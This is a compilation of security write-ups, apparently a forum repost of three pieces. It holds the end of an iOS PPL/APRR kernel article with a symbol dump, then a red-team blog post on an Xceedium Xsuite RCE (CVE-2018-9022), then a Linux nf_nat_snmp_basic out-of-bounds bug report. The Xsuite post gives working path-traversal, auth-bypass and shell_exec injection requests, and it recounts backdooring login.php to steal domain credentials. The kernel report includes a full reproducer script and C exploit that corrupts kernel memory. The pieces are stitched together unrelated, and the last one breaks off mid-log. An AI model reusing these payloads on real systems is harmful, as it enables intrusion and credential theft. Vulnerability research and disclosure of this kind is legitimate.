0xfffffff008f4bacc _ppl_pmap_protect_options_internal 0xfffffff0077c1fc0: 0xfffffff008f4b754 _ppl_pmap_query_page_info_internal 0xfffffff0077c1fc8: 0xfffffff008f4b458 _ppl_pmap_query_resident_internal 0xfffffff0077c1fd0: 0xfffffff008f4b3a0 _ppl_pmap_reference_internal 0xfffffff0077c1fd8: 0xfffffff008f4afc4 _ppl_pmap_remove_options_internal 0xfffffff0077c1fe0: 0xfffffff008f4afbc _ppl_pmap_return_internal 0xfffffff0077c1fe8: 0xfffffff008f4acec _ppl_pmap_set_cache_attributes_internal 0xfffffff0077c1ff0: 0xfffffff008f4ac38 _ppl_pmap_set_nested_internal 0xfffffff0077c1ff8: 0xfffffff008f4ac34 _ppl_pmap_0x1b_internal 0xfffffff0077c2000: 0xfffffff008f4aa78 _ppl_pmap_switch_internal 0xfffffff0077c2008: 0xfffffff008f4a8b0 _ppl_pmap_switch_user_ttb_internal 0xfffffff0077c2010: 0xfffffff008f4a8a0 _ppl_pmap_clear_user_ttb_internal 0xfffffff0077c2018: 0xfffffff008f4a730 _ppl_pmap_unmap_cpu_windows_copy_internal 0xfffffff0077c2020: 0xfffffff008f4a09c _ppl_pmap_unnest_options_internal 0xfffffff0077c2028: 0xfffffff008f4a098 _ppl_pmap_0x21_internal 0xfffffff0077c2030: 0xfffffff008f49fbc _ppl_pmap_cpu_data_init_internal 0xfffffff0077c2038: 0xfffffff008f49d0c _ppl_pmap_0x23_internal 0xfffffff0077c2040: 0xfffffff008f49c08 _ppl_pmap_set_jit_entitled_internal 0xfffffff0077c2048: 0xfffffff008f49940 _ppl_pmap_initialize_trust_cache 0xfffffff0077c2050: 0xfffffff008f494c0 _ppl_pmap_load_trust_cache_internal 0xfffffff0077c2058: 0xfffffff008f492e8 _ppl_pmap_is_trust_cache_loaded 0xfffffff0077c2060: 0xfffffff008f47d54 _ppl_pmap_check_static_trust_cache 0xfffffff0077c2068: 0xfffffff008f47d58 _ppl_pmap_check_loaded_trust_cache 0xfffffff0077c2070: 0xfffffff008f46ea0 _ppl_pmap_cs_register_cdhash_internal 0xfffffff0077c2078: 0xfffffff008f46a50 _ppl_pmap_cs_unregister_cdhash_internal 0xfffffff0077c2080: 0xfffffff008f45ef8 _ppl_pmap_cs_associate_internal_options 0xfffffff0077c2088: 0xfffffff008f45ca0 _ppl_pmap_cs_lookup_internal 0xfffffff0077c2090: 0xfffffff008f45a80 
_ppl_pmap_cs_check_overlap_internal
0xfffffff0077c2098: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20a0: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20a8: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20b0: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20b8: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20c0: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20c8: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20d0: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20d8: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20e0: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20e8: 00 00 00 00 00 00 00 00 ........
0xfffffff0077c20f0: 0xfffffff008f457b8 _ppl_pmap_iommu_init_internal
0xfffffff0077c20f8: 0xfffffff008f456e4 _ppl_pmap_iommu_unknown1_internal
0xfffffff0077c2100: 0xfffffff008f455c8 _ppl_pmap_iommu_map_internal
0xfffffff0077c2108: 0xfffffff008f454bc _ppl_pmap_iommu_unmap_internal
0xfffffff0077c2110: 0xfffffff008f45404 _ppl_pmap_iommu_unknown_internal
0xfffffff0077c2118: 0xfffffff008f45274 _ppl_pmap_iommu_ioctl_internal
0xfffffff0077c2120: 0xfffffff008f446c0 _ppl_pmap_trim_internal
0xfffffff0077c2128: 0xfffffff008f445b0 _ppl_pmap_ledger_alloc_init_internal
0xfffffff0077c2130: 0xfffffff008f441dc _ppl_pmap_ledger_alloc_internal
0xfffffff0077c2138: 0xfffffff008f44010 _ppl_pmap_ledger_free_internal
0xfffffff0077c2140: 00 00 00 00 00 00 00 00 ........

PPL-protected pages are marked using otherwise unused PTE bits (#59 - PPL, #60 - executable). PPL likely extends to IOMMU/T8020 DART and the NVMe (to foil Ramtin Amin-style attacks, no doubt). The special APRR register locks down at the hardware level, similar to KTRR's special registers. Access to these PPL-protected pages can only be performed when the APRR register is locked down (0x4455445564666677). This happens on entry to the Trampoline. On exit from the Trampoline code the register is set to 0x4455445464666477. i.e. ...6677 locks, ...6477 unlocks. Why AAPL chose these values, I have no idea (DUDU?
Dah Dah?). But checking for the magic (by MRSing) will tell you if the system is PPL locked down or not. For those of you who use IDA, get them to update their special registers already. And add jtool2's/disarm's :-). The APRR_EL1 is S3_4_C15_C2_1. There's APRR_EL0 (S3_4_C15_C2_0) and some mask register in S3_4_C15_C2_6. There may be more. A global in kernel memory is used as an indication that PPL has been locked down. The PPL service table (entered through _ppl_enter and with functions all in the __PPLTRAMP.__text) can be found and its services enumerated, as in the table above. To get these (~150) PPL symbols yourself, on any kernelcache.release.iphone11, simply use the jtool2 binary, and export PPL=1. This is a special build for this article - in the next nightly this will be the default.

Q&A

When is Volume II coming out? In a matter of weeks, I hope.

Advertisement

There's another MOXiI training set for March 11th-15th in NYC again. Right after is the follow-up to MOXiI - applied *OS Security/Insecurity - in which I discuss PPL, KTRR, APRR, KPP, AMFI, and other acronyms.

Greets

@S1guza - for a thorough review of the article, and reading the ARM64 specs like few have or ever will.
Luca - for reviewing and redacting the reason why the article's namesake applies in more than one way :-).. and pointing out he gave a talk on this at Tensec and BlueHat.il, which is well worth reading.

Source: http://newosxbook.com/articles/CasaDePPL.html
  20. Remote Code Execution — Gaining Domain Admin due to a typo CVE-2018–9022 Daniel C Mar 1

Firstly, apologies for the click-bait title; I did refrain from creating a custom website and logo, so I believe this is a fair compromise. :) A short time ago, as part of a red team engagement, I found and successfully exploited a remote code execution vulnerability that resulted in us quickly gaining high-privilege access to the customer's internal network. So far nothing sounds too out of the ordinary; however, interestingly, the root cause of this vulnerability was a two-character typo. The advisory can be found here. Note: I realise this blog post would be much better if I included some additional screenshots; however, I did not want to risk accidentally revealing information about our client.

Enumeration

After performing some basic enumeration I found a subdomain belonging to the target organisation which proudly stated "Powered by Xceedium Xsuite". After a bit of googling I stumbled across an exploit-db article containing several vulnerabilities in Xsuite, including unauthenticated command injection, reflected cross-site scripting, arbitrary file read, and a local privilege escalation vulnerability. Easy, right?

Arbitrary File Read

Unfortunately, due to the target's configuration the command injection vulnerability did not work, the privilege escalation requires prior access to the device, and where possible I wanted to avoid user interaction (so cross-site scripting is a no-no). This left us with the arbitrary file read:

/opm/read_sessionlog.php?logFile=....//....//....//etc/passwd

Naturally, the only ports that could be accessed over the internet were 80 & 443.
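The "....//" sequences are a classic bypass for a sanitizer that strips "../" in a single, non-recursive pass: removing the inner "../" from "....//" leaves behind a fresh "../". A quick illustration in plain Python (that Xsuite filters this way is an inference from the working payload, not confirmed from its source):

```python
# "....//"  ->  strip one "../"  ->  "../"
# A single-pass, non-recursive filter therefore rebuilds the very
# traversal sequence it was meant to remove. (The filter below is a
# guess at Xsuite's behavior, inferred from the payload that works.)

def naive_filter(path):
    return path.replace("../", "")   # one pass, never re-applied

payload = "....//....//....//etc/passwd"
print(naive_filter(payload))         # the traversal survives
```

After filtering, the payload collapses to ../../../etc/passwd - exactly the path the arbitrary file read ends up serving. A robust filter would loop until no "../" remains (or, better, canonicalize and validate the resulting path).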
Despite being able to read various hashes from the /etc/passwd file, they were useless to us:

sshtel:ssC/xRTT<REDACTED>:300:99:sshtel:/tmp:/usr/bin/telnet
sftpftp:$1$7vs1J<REDACTED>:108:108:/home/sftpftp

At this point I believed the best way forward was to find the host's document_root and to start downloading source code. I could then manually audit the code with the intention of finding additional vulnerabilities in Xceedium Xsuite. After reading numerous Apache configuration files, the document_root was found: /var/www/htdocs/uag/web/

So far we only know the location of two pages:

/var/www/htdocs/uag/web/opm/read_sessionlog.php
/var/www/htdocs/uag/web/login.php

The source code for both of these files was downloaded using the arbitrary file read and reviewed to find references to any other PHP or configuration files. These were also downloaded. Whilst this process could have been scripted, it was decided that since I would be auditing the code, I may as well manually retrieve the source code during the auditing process (this also has the added benefit of limiting requests to the target host). After a day of manually downloading and auditing PHP, I believed I had a good enough understanding of how the application works and had found a few bugs/interesting functions. In addition to the RCE outlined in this post, other vulnerabilities were found along the way, such as an additional arbitrary file read and various SQL injection issues. As I could already read local files and no database appeared to be configured, these were useless. My only interest at this point was RCE.

The road to code execution

One of the interesting functions I had highlighted was linkDB(), which reads the contents of /var/uag/config/failover.cfg line by line and passes it to the eval() function. This means that if we somehow find a method to write PHP code to failover.cfg, we may then be able to call the linkDB() function to execute remote code on the host.
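The author notes the download-and-review loop could have been scripted; the reference-extraction half of such a script might look like the following sketch (the regex and the sample source line are illustrative, not taken from Xsuite):

```python
import re

# Matches include/require/include_once/require_once of a quoted .php path.
INCLUDE_RE = re.compile(
    r'''(?:include|require)(?:_once)?\s*\(?\s*["']([^"']+\.php)["']''')

def find_references(php_source):
    """Return the unique .php paths referenced by a blob of PHP source."""
    return sorted(set(INCLUDE_RE.findall(php_source)))

src = 'include("functions/DB.php"); require_once "functions/activeActiveCmd.php";'
```

Each newly discovered path would be fed back through the arbitrary file read until no new files turn up.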
Interesting, but we currently have no control over failover.cfg or its contents.

/var/www/htdocs/uag/functions/DB.php

function linkDB($db, $dbtype='', $action = "die")
{
    global $dbchoices, $sync_on, $members, $shared_key;
    if (!$dbchoices) {
        $dbchoices = array("mysql", "<REDACTED>", "<REDACTED>");
    }
    //reads file into array & saves to $synccfg
    $synccfg = file("/var/uag/config/failover.cfg");
    //iterates through contents of array
    foreach ($synccfg as $line) {
        $line = trim($line);
        $keyval = explode("=", $line);
        //saves contents to $cmd variable
        $cmd = "\$param_".$keyval[0]."=\"".$keyval[1]."\";";
        //evaluates the contents of the $cmd variable
        eval($cmd);
    }
    …
}

After a while I located the functionality that populates /var/uag/config/failover.cfg (this code has been modified slightly to avoid including numerous lines of string parsing!).

/var/www/htdocs/uag/functions/activeActiveCmd.php

function putConfigs($post)
{
    …
    $file = "/var/uag/config/failover.cfg";
    $post = unserialize(base64_decode($post)); // <-- ignore this ;)
    …
    $err = saveconfig($file, $post);
    …
}

To summarise: We now know the contents of failover.cfg are passed to eval(), which may lead to code execution. We know the putConfigs() function takes a parameter, passes it to base64_decode(), passes it to unserialize() (again, let's just pretend you never saw this!) and then saves it to failover.cfg.

Now we need to see where the $post variable used in putConfigs() originates and whether we have any control over it.

/var/www/htdocs/uag/functions/activeActiveCmd.php

function activeActiveCmdExec($get)
{
    …
    // process the requested command
    switch ($get["cmdtype"]) {
    …
    case "CHECKLIST":
        confirmCONF($get);
        break;
    case "PUTCONFS":
        putConfigs($get["post"]);
        break;
    …
    }
}

So the $get parameter being passed to putConfigs() originates from a parameter being passed to the activeActiveCmdExec() function.
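The danger of linkDB()'s pattern — splicing untrusted KEY=VALUE lines into evaluated code — can be reproduced outside PHP. A Python analogue using exec() (all names here are invented for illustration; PHP's eval() of '$param_KEY="VALUE";' behaves analogously):

```python
def parse_config_line(line):
    """Mimics linkDB(): builds 'param_KEY = "VALUE"' and evaluates it."""
    key, _, val = line.strip().partition("=")
    stmt = 'param_%s = "%s"' % (key, val)
    ns = {}
    exec(stmt, ns)  # the dangerous step, like PHP's eval()
    return ns

benign = parse_config_line("SHARED_KEY=abc")
# A value containing '";' closes the quoted string and smuggles in a statement:
evil = parse_config_line('CLUSTER_FQDN=x"; pwned = "yes')
```

Any value containing a double quote followed by a statement separator escapes the intended assignment — exactly the property the exploit later relies on when writing to failover.cfg.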
/var/www/htdocs/uag/functions/ajax_cmd.php

if ($_GET["cmd"] == "ACTACT") {
    if (!isset($_GET['post'])) {
        $matches = array();
        preg_match('/.*\&post\=(.*)\&?$/', $_SERVER['REQUEST_URI'], $matches);
        $_GET['post'] = $matches[1];
    }
    activeActiveCmdExec($_GET);
}

So activeActiveCmdExec() takes direct user input. This means we can directly control the input to activeActiveCmdExec(), which is then passed to putConfigs(), base64_decode(), unserialize(), and finally saved into /var/uag/config/failover.cfg. We can now create a serialized, base64-encoded request that will be saved into failover.cfg; afterwards we can invoke linkDB(), which will pass the file containing our malicious code to eval(), and we have achieved code execution… Or so I thought.

As we will be overwriting a configuration file, one mistake and we may brick the device and have a rather unhappy customer on our hands. Even if we don't brick the device, we may only get one chance at writing to the config file. Because of this I decided to err on the side of caution, took the relevant parts of the code, and tested our exploit locally. After a few attempts I was getting the message "BAD SHARED KEY". Unfortunately I had overlooked something at the beginning of the activeActiveCmdExec() function:

/var/www/htdocs/uag/functions/activeActiveCmd.php

function activeActiveCmdExec($get)
{
    // check provided shared key
    $logres = checkSharedKey($get["shared_key"]);
    if (!$logres) {
        echo "BAD SHARED KEY";
        exit(0);
    }
    …
}

The function checks that a valid shared key is passed via the $get variable. Without a legitimate key we cannot reach the functionality necessary to write our code to the failover.cfg file, we cannot invoke linkDB() to evaluate our code, and we cannot execute code on the remote host… At this point I believed it might be time to go back to the drawing board and find a new method to attack the host (unsanitised user input being passed to unserialize(), perhaps?).
Fortunately, as I have the ability to read local files, the shared key may be hard-coded in the source code or saved in a readable config file. We can then include the key in our request and pass this check. So let's check the checkSharedKey() function to see where this shared key is saved.

/var/www/htdocs/uag/functions/activeActiveCmd.php

function checkSharedKey($shared_key)
{
    if (strlen($shared_key) != 32) { //1
        return false;
    }
    if (trim($shared_key) == "") { //2
        return flase;
    }
    if ($f = file("/var/uag/config/failover.cfg")) {
        foreach ($f as $row) { //3
            $row = trim($row);
            if ($row == "") {
                continue;
            }
            $row_sp = preg_split("/=/", $row);
            if ($row_sp[0] == "SHARED_KEY") {
                if ($shared_key == $row_sp[1]) //4
                    return true;
            }
        }
    } else {
        return false;
    }
}

This function does the following: 1) Checks the key passed to it is 32 characters in length; 2) Checks the key passed to it isn't an empty string; 3) Reads the failover.cfg file line by line; 4) Checks the provided shared key matches the shared key in failover.cfg.

So we can use our arbitrary file read to extract the shared key from the /var/uag/config/failover.cfg file, append it to our request, write our serialised, base64'd PHP code to failover.cfg, invoke linkDB() to eval() our malicious code, and execute code on the remote host. After reading the contents of failover.cfg I was greeted with the following:

/var/uag/config/failover.cfg

CLUSTER_MEMBERS=
ACTIVE_IFACE=
SHARED_KEY=
STATUS=
MY_INDEX=
CLUSTER_STATUS=
CLUSTER_IP=
CLUSTER_NAT_IP=
CLUSTER_FQDN=

The file is empty. We cannot steal the existing key to pass the authentication checks as there isn't one configured. After again failing, I turned my attention back to the checkSharedKey() functionality. The first thing the checkSharedKey() function does is check the provided key is 32 characters long. This means we cannot simply pass a blank key to pass the check. Once again it may be game over.
However, after a while I noticed a subtle issue that I had previously overlooked. Did you see it?

/var/www/htdocs/uag/functions/activeActiveCmd.php

function checkSharedKey($shared_key)
{
    if (strlen($shared_key) != 32) {
        return false;
    }
    if (trim($shared_key) == "") {
        return flase;
    }
    …
}

Due to a typographic error, when a shared key is provided that is 32 characters in length but empty after a call to trim(), the function will return flase — which PHP evaluates as the literal string "flase" (an undefined constant coerced to a string) instead of the Boolean value FALSE. Fortunately for us, the string "flase" has a Boolean value of TRUE, so the key check will succeed and we can bypass the authorisation check. Reviewing PHP's trim() manual we find the following:

http://php.net/manual/en/function.trim.php

So in theory we can use 32 spaces, tabs, line feeds, carriage returns, null bytes, or vertical tabs to reach the code paths required to execute code. All because somebody typed two characters the wrong way around in the word "false"! To test our theory we can take the relevant parts of the code and write a small script that uses the same logic as the Xsuite code.

<?php
//Take user input
$shared_key = $_GET['shared_key'];
//Echo user input
echo "Input: " . $shared_key . "\n";
//Echo the string length (hopefully 32)
echo "shared_key Length: " . strlen($shared_key) . "\n";
//Pass the input to the checkSharedKey() function
$logres = checkSharedKey($shared_key);
//Echo the raw returned value
echo "Raw Returned Value: ";
var_dump($logres);
//Echo the Boolean value of the returned value
echo "Boolean Returned Value: ";
var_dump((bool) $logres);
//Echo either "bad shared key" or "auth bypassed" accordingly
if (!$logres) {
    echo "BAD SHARED KEY\n";
    exit(0);
} else {
    echo "Auth Bypassed";
}

function checkSharedKey($shared_key)
{
    if (strlen($shared_key) != 32) {
        return false;
    }
    if (trim($shared_key) == "") {
        return flase;
    }
}
?>

I then tested a few inputs to see what happened: As expected, passing a 32-character random string returns the Boolean value FALSE and we do not bypass the checks. Now to try our theory of carriage returns/null bytes/etc.: As predicted, a string composed of 32 carriage returns, null bytes, etc. will bypass the checkSharedKey() functionality. We can now bypass the authorisation checks to reach our desired code paths. As there are a lot of steps to this exploit and a significant number of things that may go wrong, it was decided that we should once again test the exploit locally with the relevant code.
Exploitation

After a while testing locally, the following exploitation steps had been refined:

1. Poison failover.cfg with our malicious code using our $shared_key bypass:

ajax_cmd.php?cmd=ACTACT&cmdtype=PUTCONFS&shared_key=%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D&post=YTo2OntzOjExOiJyYWRpb19pZmFjZSI7czo1OiJpZmFjZSI7czoxNToiY2x1c3Rlcl9tZW1iZXJzIjthOjE6e2k6MDtzOjk6IjEyNy4wLjAuMSI7fXM6MTM6InR4X3NoYXJlZF9rZXkiO3M6MzI6IkFBQUFCQkJCQ0NDQ0RERFhYQUFBQkJCQkNDQ0NEREREIjtzOjY6InN0YXR1cyI7czozOiJPRkYiO3M6MTI6ImNsdXN0ZXJfZnFkbiI7czo1NToidGVzdC5kb21haW4iO2VjaG8gc2hlbGxfZXhlYyh1cmxkZWNvZGUoJF9QT1NUWydjJ10pKTsvLyI7czoxMDoiY2x1c3Rlcl9pcCI7czo5OiIxMjcuMC4wLjEiO30=

Decoding the contents of the post parameter gives the following serialized payload:

a:6:{s:11:"radio_iface";s:5:"iface";s:15:"cluster_members";a:1:{i:0;s:9:"127.0.0.1";}s:13:"tx_shared_key";s:32:"AAAABBBBCCCCDDDXXAAABBBBCCCCDDDD";s:6:"status";s:3:"OFF";s:12:"cluster_fqdn";s:55:"test.domain";echo shell_exec(urldecode($_POST['c']));//";s:10:"cluster_ip";s:9:"127.0.0.1";}

which corresponds to a PHP array of the form:

$data = array();
$data['radio_iface'] = "iface";
$data['cluster_members'] = array("127.0.0.1");
$data['tx_shared_key'] = "AAAABBBBCCCCDDDXXAAABBBBCCCCDDDD";
$data['status'] = "OFF";
$data['cluster_fqdn'] = "test.domain\";echo shell_exec(urldecode($_POST['c']));//";
$data['cluster_ip'] = "127.0.0.1";

Note that the cluster_fqdn value carries the injected PHP: once it is written to failover.cfg and interpolated into eval() by linkDB(), the "; sequence closes the quoted string and the remainder of the value executes.

2. Verify the config file has been successfully poisoned by reading it back using the arbitrary file read vulnerability in read_sessionlog.php.

3. Invoke linkDB() to eval() the contents of failover.cfg and execute a command:

POST /ajax_cmd.php?cmd=get_applet_params&sess_id=1&host_id=1&task_id=1

c=whoami

Conclusion

Upon first discovering the Xceedium device, it appeared we had struck gold: a significantly outdated device with publicly available exploits resulting in RCE.
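Step 1 can be sketched as a small payload builder. This illustrative Python version serializes only the poisoned cluster_fqdn field rather than the full six-element array from the request above:

```python
import base64
from urllib.parse import quote

def php_str(s):
    # PHP serialized string: s:<byte length>:"<value>";
    return 's:%d:"%s";' % (len(s), s)

# the value breaks out of the quoted assignment that linkDB() later eval()s
inject = 'test.domain";echo shell_exec(urldecode($_POST[\'c\']));//'

# minimal one-element serialized array (the real payload carries six fields)
payload = 'a:1:{%s%s}' % (php_str("cluster_fqdn"), php_str(inject))
post = base64.b64encode(payload.encode()).decode()

# 32 URL-encoded carriage returns for the checkSharedKey() bypass
shared_key = quote("\r") * 32
```

Note that the injected value serializes with length 55 — the same s:55 that appears in the real payload above.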
Naturally this was not the case, and successful compromise took significantly more time and effort than originally expected. For those of you who are curious how the rest of the engagement went: upon compromising the device we quickly discovered a method to gain root access to it. Due to the nature of Xceedium Xsuite (identity and access management), hundreds of users were authenticating to the device every day. With root access we simply backdoored login.php to steal hundreds of domain credentials. Fortunately for us, some of the clear-text credentials we captured belonged to domain/enterprise administrators. This allowed us complete access to various domains across the globe. Obviously the goal of red teaming isn't to gain domain administrator, but it certainly helps. :) As previously mentioned, I'm sorry that there aren't more screenshots showing the actual attack, however I don't want to risk outing the client. Additionally, at the time of discovery I had no intentions of releasing this bug publicly. Finally, I wish I could say Xceedium (now CA Technologies) were a treat to work with during the disclosure process, however that would be a lie.

Daniel C

Sursa: https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
  21. commit cc2d58634e0f ("netfilter: nf_nat_snmp_basic: use asn1 decoder library", first in 4.16) changed the nf_nat_snmp_basic module (which, when enabled, parses and modifies the ASN.1-encoded payloads of SNMP messages) so that the kernel's ASN.1 infrastructure is used instead of an open-coded parser. The common ASN.1 decoder can invoke callbacks when certain objects are encountered. The SNMP helper has two such callbacks defined in nf_nat_snmp_basic.asn1:

- For the `version` field of a `Message` (an `INTEGER`), snmp_version() is invoked.
- For each `IpAddress` (according to RFC 1155, a 4-byte octet string), snmp_helper() is invoked.

These callbacks contain the following code:

int snmp_version(void *context, size_t hdrlen, unsigned char tag,
		 const void *data, size_t datalen)
{
	if (*(unsigned char *)data > 1)
		return -ENOTSUPP;
	return 1;
}

int snmp_helper(void *context, size_t hdrlen, unsigned char tag,
		const void *data, size_t datalen)
{
	struct snmp_ctx *ctx = (struct snmp_ctx *)context;
	__be32 *pdata = (__be32 *)data;

	if (*pdata == ctx->from) {
		pr_debug("%s: %pI4 to %pI4\n", __func__,
			 (void *)&ctx->from, (void *)&ctx->to);
		if (*ctx->check)
			fast_csum(ctx, (unsigned char *)data - ctx->begin);
		*pdata = ctx->to;
	}
	return 1;
}

The problem is that both of these callbacks can be invoked by the ASN.1 parser with `data` pointing at the end of the packet and `datalen==0` (even though, for the `INTEGER` type, X.690 says in section 8.3.1 that "The contents octets shall consist of one or more octets"), but they don't check whether there is sufficient input available. This means that snmp_version() can read up to one byte out-of-bounds and leak whether that byte was <=1, and snmp_helper() can read and potentially also write up to four bytes out-of-bounds.
Unfortunately, KASAN can't detect the out-of-bounds reads because, as was pointed out in <https://lore.kernel.org/lkml/552d49b6-1b6e-c320-b56a-a119e360f1d7@gmail.com/> regarding a (harmless) out-of-bounds read in the TCP input path, the kernel stores a `struct skb_shared_info` at the end of the socket buffer allocation, directly behind the packet data. The kernel can only detect that a problem occurred based on the later effects of an out-of-bounds write. It might be a good idea to explicitly add some KASAN poison between the head data and struct skb_shared_info to make it easier for kernel fuzzers to discover issues like this in the future. There are two scenarios in which this bug might be attacked: - A router that performs NAT translation is explicitly set up to invoke the SNMP helper, and a device in the NATted network wants to attack the router. This is probably very rare, since the router would need to be explicitly configured to perform SNMP translation. On top of that, to corrupt memory, an attacker would need to be able to completely fill an SKB; it isn't clear to me whether that is possible remotely. - A local attacker could exploit the bug by setting up new network namespaces with an iptables configuration that invokes SNMP translation. This probably works as a local privilege escalation against some distribution kernels. The normal autoloading path for this code was only set up in commit 95c97998aa9f ("netfilter: nf_nat_snmp_basic: add missing helper alias name", first in 4.20), but from a glance, it looks like it would be possible on kernels before 4.20 to instead first load one of the openvswitch module's aliases "net-pf-16-proto-16-family-ovs_*" through ctrl_getfamily(), then use ovs_ct_add_helper() to trigger loading of "nf_nat_snmp_basic" through the alias "ip_nat_snmp_basic". 
The following is a reproducer for a git master build that causes a kernel oops (nf_nat_snmp_basic must be compiled into the kernel, or built as a module, I think):

======================================================================
#!/bin/sh
unshare -mUrnp --mount-proc --fork bash <<SCRIPT_EOF
set -e
set -x

# make "ip netns" work in here
mount -t tmpfs none /var/run/
cd /var/run

# this namespace is the router with NAT
ip link set dev lo up
echo 1 > /proc/sys/net/ipv4/ip_forward
/sbin/iptables -t nat -A POSTROUTING -o veth0 -j MASQUERADE
/sbin/iptables -t raw -A PREROUTING -p udp --dport 162 -j CT --helper snmp_trap
/sbin/iptables -A FORWARD -m conntrack --ctstate INVALID,NEW,RELATED,ESTABLISHED,SNAT,DNAT -m helper --helper snmp_trap -j ACCEPT

# this namespace is the destination host for the SNMP trap message
ip netns add netns1
nsenter --net=/var/run/netns/netns1 ip link set dev lo up
ip link add veth0 type veth peer name veth1
ip link set veth1 netns netns1
nsenter --net=/var/run/netns/netns1 /sbin/ifconfig veth1 192.168.0.2/24 up
/sbin/ifconfig veth0 192.168.0.1/24 up

# this namespace sends the SNMP trap message
ip netns add netns2
nsenter --net=/var/run/netns/netns2 ip link set dev lo up
ip link add veth2 type veth peer name veth3
ip link set veth3 netns netns2
# /31 network, see RFC 3021
# we want *.0.0.0 so that the 3 OOB bytes can be zero
nsenter --net=/var/run/netns/netns2 /sbin/ifconfig veth3 10.0.0.0/31 up
/sbin/ifconfig veth2 10.0.0.1/24 up
nsenter --net=/var/run/netns/netns2 ip route add default via 10.0.0.1
# debug ip route
nsenter --net=/var/run/netns/netns2 ip route

# run the PoC
cat > udp_repro.c <<C_EOF
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <net/if.h>
#include <linux/if.h>
#include <linux/ip.h>
#include <linux/udp.h>
#include <linux/in.h>
#include <err.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>

#define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24))

// "pc X" comments in the following array refer to indices into
// nf_nat_snmp_basic_machine in "nf_nat_snmp_basic.asn1.c", which
// is generated as part of the kernel's build process.
// reading the ASN.1 decoder and the generated machine opcodes
// seemed easier than trying to build ASN.1 by looking at the
// spec or something like that...
uint8_t snmp_packet[] = {
  // pc 0: read tag, should match _tag(UNIV, CONS, SEQ) == 0x30
  // length indef
  0x30, 0x80,
  // pc 2: read tag, should match _tag(UNIV, PRIM, INT) == 0x02
  // version number
  0x02, 0x01, 0x00,
  // pc 5: read tag, should match _tag(UNIV, PRIM, OTS) == 0x04
  0x04, 0x00,
  // pc 7: read tag, should match _tagn(CONT, CONS, 0) == 0xa0
  // selects GetRequest-PDU, length indef
  0xa0, 0x80,
  // pc 34: read INT request-id
  0x02, 0x04, 0x00, 0x00, 0x00, 0x00,
  // pc 36: read INT error-status
  0x02, 0x04, 0x00, 0x00, 0x00, 0x00,
  // pc 38: read INT error-index
  0x02, 0x04, 0x00, 0x00, 0x00, 0x00,
  // pc 40: read seq VarBindList
  // length indef
  0x30, 0x80,
  // pc 42: read seq VarBind
  // length indef
  0x30, 0x80,
  // ptr 44: read tag, should match _tag(UNIV, PRIM, OID) == 0x06
  // ObjectName
  // (can use 0x82 as length to have two bytes of length following)
  // length chosen so that the end of packet data is directly
  // followed by the skb_shared_info, with the whole thing in a
  // kmalloc-512 slab.
  0x06, 0x70,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  // ptr 46: read tag, should skip
  // ptr 48: read tag, should skip
  // ptr 50: read tag, should skip
  // ptr 52: read tag, should match _tagn(APPL, PRIM, 0) == 0x40
  // IpAddress
  // we could also use a length of zero, and the callback would still
  // be invoked, but we want control over the first byte so that we
  // can create a source IP match.
  0x40, 0x01,
  // source IP 10.0.0.0
  0x0a
};

void do_sendto(int sockfd, const void *buf, size_t len, int flags,
               const struct sockaddr *dest_addr, socklen_t addrlen)
{
  int res = sendto(sockfd, buf, len, flags, dest_addr, addrlen);
  if (res != len) {
    if (res == -1)
      err(1, "send failed");
    else
      errx(1, "partial send?");
  }
}

int main(void)
{
  int sock = socket(AF_INET, SOCK_DGRAM, 0);
  if (sock == -1)
    err(1, "socket");
  struct sockaddr_in sa = {
    .sin_family = AF_INET,
    .sin_port = htons(162),
    .sin_addr = { .s_addr = IPADDR(192,168,0,2) }
  };
  // __ip_append_data() overallocates by 15 bytes for some reason; cancel it out
  // by using CORK to first send 15 bytes short, then append the remaining 15 bytes
  do_sendto(sock, snmp_packet, sizeof(snmp_packet)-15, MSG_MORE,
            (struct sockaddr *)&sa, sizeof(sa));
  do_sendto(sock, ((char*)snmp_packet)+sizeof(snmp_packet)-15, 15, 0,
            (struct sockaddr *)&sa, sizeof(sa));
}
C_EOF
gcc -o udp_repro udp_repro.c -Wall
nsenter --net=/var/run/netns/netns2 ./udp_repro
SCRIPT_EOF
======================================================================

Corresponding splat:

======================================================================
[ 260.101983] IPVS: ftp: loaded support on port[0] = 21 [ 260.134983] LoadPin: vda1 (254:1): writable [ 260.135981] LoadPin: enforcement can be
